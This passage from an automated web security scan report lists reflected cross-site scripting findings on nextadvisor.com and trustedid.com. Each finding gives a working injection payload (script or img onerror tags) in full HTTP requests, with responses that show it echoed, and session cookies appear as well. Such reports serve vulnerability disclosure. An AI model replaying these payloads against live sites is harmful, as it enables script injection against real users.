Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be" />
...[SNIP]...

5.71. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e678"><script>alert(1)</script>59725e772e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:07 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js" />
...[SNIP]...

5.72. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612b5"><script>alert(1)</script>5ee41bf8af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js" />
...[SNIP]...

5.73. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f was submitted in the REST URL parameter 2. This input was echoed as c856d'><img src=a onerror=alert(1)>43a6f1cd54f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsc856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsc856d'><img src=a onerror=alert(1)>43a6f1cd54f/index.php' class='nav_select'>
...[SNIP]...

5.74. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999eb"><script>alert(1)</script>e7251367e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18" />
...[SNIP]...

5.75. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382db"><script>alert(1)</script>73094e0c235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid382db"><script>alert(1)</script>73094e0c235/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:29:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid382db"><script>alert(1)</script>73094e0c235/style.css" />
...[SNIP]...

5.76. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2 was submitted in the REST URL parameter 1. This input was echoed as e22eb'><img src=a onerror=alert(1)>65ff3245d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmide22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/pmide22eb'><img src=a onerror=alert(1)>65ff3245d2/index.php' class='nav_select'>
...[SNIP]...

5.77. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99035"><script>alert(1)</script>aad44ddd58a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/style.css99035"><script>alert(1)</script>aad44ddd58a HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/style.css99035"><script>alert(1)</script>aad44ddd58a" />
...[SNIP]...

5.78. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee863'><script>alert(1)</script>c9c8e536919 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919'/>
...[SNIP]...

5.79. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd735"><script>alert(1)</script>6c8574a0de7 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<a href="/?promoRefCode=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7" class="lp-get-ide-link">
...[SNIP]...

5.80. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The value of the promoCodeRefIdf request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5092'><script>alert(1)</script>11d7a4f151a was submitted in the promoCodeRefIdf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...
<input type='hidden' name='promo' value='NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a'/>
...[SNIP]...

5.81. https://www.trustedid.com/suzeidprotector/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85c56"><script>alert(1)</script>0c0f9b808c2 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=&email=85c56"><script>alert(1)</script>0c0f9b808c2 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="85c56"><script>alert(1)</script>0c0f9b808c2" id="email" name="email" gtbfieldid="3">
...[SNIP]...

5.82. https://www.trustedid.com/suzeidprotector/ [first_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3782"><script>alert(1)</script>f649900f46c was submitted in the first_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=e3782"><script>alert(1)</script>f649900f46c&last_name=&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:54:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...
<input type="text" validate="name" class="hp-form-field " value="e3782"><script>alert(1)</script>f649900f46c" id="first_name" name="first_name" gtbfieldid="1">
...[SNIP]...

5.83. https://www.trustedid.com/suzeidprotector/ [last_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87203"><script>alert(1)</script>ef9dea1c101 was submitted in the last_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /suzeidprotector/?first_name=&last_name=87203"><script>alert(1)</script>ef9dea1c101&email= HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:55:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
